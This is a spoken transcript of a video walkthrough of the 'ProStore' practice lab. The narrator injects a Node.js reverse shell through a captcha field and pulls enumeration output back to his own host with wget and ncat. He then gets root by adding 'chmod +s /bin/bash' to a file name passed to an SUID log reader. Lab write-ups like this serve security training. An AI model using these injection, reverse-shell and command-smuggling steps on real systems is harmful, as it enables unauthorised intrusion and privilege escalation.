Okay, hi everyone, welcome back. Today we're going to look at another machine. Today machine is called ProStore. So before starting the video, I identified the IP address, my IP address, and the target machine IP address. And also to save time, I run the port scan, the traditional port scan that I run. We discovered the number of ports, port 22, usually not the traditional target. We can see that the traditional web ports are closed, and seems that there is a web server that runs Node JS runs on port 50,000. So possibly this will be my main target. So quickly I will try to enumerate the web server. So 137, 250 on port 5000. And let's quickly visit it. Okie dokie. So as the name implies, it's a store. So most likely I will be able to see products and add a product to the list. Okay, so I can see the products here. Need to log in. Don't have username and password. Okay. Probably then I need to register. Okay, so let's register here. I will create a user account called user at ga.com. Let's put password test. Okay, so now I logged in. Okay, now I'm sure then I will be able to add things in the cart now. Okay, so if I go to get checkout, I will be asked for the information. Okay, and I can put any number. And here I can see there is kind of a captcha challenge. Okay, so probably a better way to see what's happening at the end here is to use Burp Suite. Because I need to see what parameters will be submitted, and I would see what will be the impact if I change the values of these parameters. So interception is on. And let's just put 3 for now. Okay, so that was intercepted. Let me send it to the repeater. So when I send the correct one, okay, that, or this is the message I receive. What will happen if I send a wrong one? Okay, it's give me the same message here. Capture error. Okay. And return the same one. What if I put a non-numeric value? Yeah, reference error is not defined. Good. So now we know something here. Okay. So what I will do now is I will try to append a a script uh, to the requests, a form of shell injection, for example. We know that it runs Node.js, so probably then I need to have a JavaScript shell, and I will try to push it through. So okay, let me see if I can go to the RevShell website. So the web page that I'm talking about is RevShell, but because Verb Suite is enabled, I will not be able to show it here. So that's fine. Okay, so let me RevShell. So reverse shell, we know this is a Linux machine. And what I'm looking for is Node.js or JS, Node.js. So let me just, there are two types of it. Let me just get the IP addresses of my system correct. So it is reverse shell, that will be the reverse shell, my IP address. And let me also, yeah, let's put it on port, Control V, let's put it on port. Now, considering that in the output, and this is something interesting, considering that port 80 and port 443 are closed, and port 5000 is allowed, I will try, usually I go for these two ports, so I will go for port 5000 in my shell. I don't know if it will be allowed, but let's try it. So based on this, I ended up having these two shells. Okay. The first one I had was based on the ref shell is this one. And the second one, slightly longer. It is this one. Okay. So I will take this one. That's more based on NCAT. Okay. I don't know if NCAT is running. This one is based on the native shell. So I will take this one and I will see if it will work. So I will do something else as well. I will create a listener on port 5000 and I will go here, and in here I will try to append the shell, and then I will send the request back. Okay. I didn't receive anything. Um, Let me just confirm my IP address again. I've config, it is 4591. Okay. Let me then change probably the ports into 443. And from here, the element I need to change is this. 443. Again, I didn't get the response I'm expecting. Okay. So what I will do is, let's see. It seems that there might be issue with the indentation here. Okay. So what I might try to do is try to run everything as a single line. So okay, probably can do it here as well. Okay. Yeah. The reason why I'm doing it, because you can see here the 443 is in blue, which means that it's considering it as part of the command itself rather than a an instruction, sorry, a parameter or an argument for an instruction. So I'm trying to see if there is a way that's possibly okay. So let me try it again. Still, there is no luck. Okay, so what can we else do here? It is really flaky. Okay. Spawn, let's try instead of sh, make it ben sh, for example. See if that might be an issue here. Or we can try bin bash. So this this is a comment here. What happened if I deleted this comment? That's interesting. Um, okay, let's put something. What was the captcha? 3. That's weird. Why this script is not working? So that's, let me just again go through the command that ref shell gave me. So it was here. Okay, finally it worked. There was a missing brackets apparently. Okay, so we have a shell. We have a shell. That's good. Okay, so let's try to see if we can upgrade this shell with any of my TTYs. Let's see if Python 3 will do the trick. It did. That's really good. So quickly ls home. What do we have in home? We have that user observer. And I think that's the user account we logged in with, observer. Okay, that means we will be able, in theory, to go to observer. Okay. So we are inside observer. What else can we do here? Let's see, sudo. I don't know the password, so if there is a password, yes, it's worth the try. Okay, let's see if there is any any files run with the sudo, for example, um, or sorry, SUID. Aha. Okay. So it seems that we have this executable runs as sudo. Okay. Let me run it, or run, sorry, with this SUID. Let's see. Copy, paste. Okay. So as you can see here, it requests a file uh, .log. Okay. So that's, as it says, it's a log reader. It's the log reader. That is interesting. Uh, so let me try the theory here. Echo, for example, hello to test.log. Good. Now if I pasted that one and I say test.log, yeah, it opens it. That's interesting. So what else can I do? So I need to keep this in mind. Let me just make note of this here. And I will go here. So I don't need these anymore. And just document this SUID. Cool. Okay, let me get the limpies. Okay, so port 80 is open now. I know that wget http my IP address. limpies.sh. Good. Change mode plus x to limpies.sh and limpies.sh, and let's make the output into len. Now what I will do also here, let me start encat and yeah, len will do. I'm waiting for limpies to finish, then I will move the len file to my Kali machine and try to see it. So encat dash nv to 192.168.45.191 on port 4444, get the len in and send it. Aha. Could it be the case that... Oh, that's bad. Okay. Let me just again get my TTY. Probably the case because port 444 is closed. We know 443 was open, and did we use it for anything? Yes, we used it for this one. So it will be difficult. Let's try port 80. If I'm honest, that's might let me then just to change this into port 80. And let me just go back in here. Let me just confirm that I still have the len. That's interesting. Oh, okay, yes, because I was in the home, cd home observer. Yeah, it is here. So again, wget http 192.168. Oh my god. Sorry for this again, guys. These things always happen. So cd home cd observer again, just wget http 192.168. 45 191 port 80, get the LAN in. Sorry, again, my mistake. I'm trying now to use ncat dash mv 192.168.45. Sorry guys, you might notice usually I record these videos really late at night. At the moment it is it's really late, so that's why sometimes lose concentration. Okay. So what do we have here? Yeah, I need to put port 80 and I need to get len. Okay, so if everything is fine, yeah, it is succeeded. So I should have y ls. Okay, cat len. Says port 80 is already in use. I don't know why port 80. Oh yes, because I have my web server running here. My mistake. Okay. So what we need to do? Let me just go ahead, copy this, and paste it. Voila. Now cat len. Just make sure that yes, we have seen it. So let's say go ahead 500. Oh, okay. Straight away, I see that GTP is installed. That is useful information. Okay, so GDP is installed. Okay, so the executable I have called log reader. So let me see if I can look at log reader with GDP. GDB log reader. Okay, let's list. Okay, so it reads informations from this file. So if I now try to cat into this file, 10 block reader. Oh, interesting. So cd temp ls cat log reader. There is no such file. I don't understand why there is no such file. Oh, .c cat temp log reader.c. Okay, let me again GDP. What was that name? That's right. So we know that's what it does. Um, that's the file itself. We just also confirmed that it has that file. But it says it's not here. Okay, so let's try find. I don't know if that will do it. Let's try it. Okay, so let's say find. The type is file. The name is logreader.c. Okay, so the logreader.c is actually in this location. That's a bit cheeky. Okay, so that's the source code basically. And I can see that the string extension is .log. Okay, so it's a check if the extension not null, then treat .log. Okay, that's interesting. So what I can do now is clearly here, just check for how many parameters were passed, get the file name, and search character of the file name for the dot, and then check if there is an extension, which is .log. So there is no, so it doesn't check what might be added after the log. So once there is log, it will do the job. Okay, so what I might be able to do now, considering that there is no validation, I might create a test file .log and then append to the name a command line. So for example, I might do something like this. So let's say echo, or let's go back to where we were, cd home observer. So we already created a test file .log. So what we might be able to do now is go ahead, use this, for example, and try to read test.log and also append to a command, change mode, for example, plus, let's make it S for the bin bash or bin sh. So what this command in essence does is that it adds the suid to the bin sh. And if it works, that means the bin sh will have the suid. Now ls-all bin sh. It does not seem to have it. It does not seem to have it. Okay, let me then change mode plus is that's the right command. Bin sh. It is directed to dash. Okay, let me try it with with bin bash instead of sh. Okay, now test dot log, then change mode plus s to bin bash, and now slo bin bash. Okay, so bin bash works. Then I can simply just get bin bash with sudo. So, or what I can do, let me try it again with different one. So I can go and exactly do the same here, sorry. Test.log, again, change mode plus s to, I think it was bin find. And fls bin find. Good. Now we know that's bin find on the what they call it, gf bin. Let me, since I don't need this anymore, proxy interception is off. That will save me a lot of hassle moving between different machines. And disable GTF or bin. SUID find, for example. So with the find with SUID, then possibly I will be able to run this command. So I can try it, or I can try, for example, as sudo bin bash. Oh, that's okay. That should work. Probably I can run it with the SU as well. If it didn't work, then I will try the come on, the find. I'm sure there would be one for bin bash. Let me just go quickly here. Bash. I can just run it bin bash. Yeah. Seems as I can just run it with a dash b. So bin bash dash p. Yep. Oh, sorry. ID. And you can see that I'm root. Pretty much I can exactly do the same with find as we established. And sorry for the hiccups in the write-ups, but this is how ProStore could be configured and the privilege escalation could be achieved. Okay, see you in another video. Bye for now.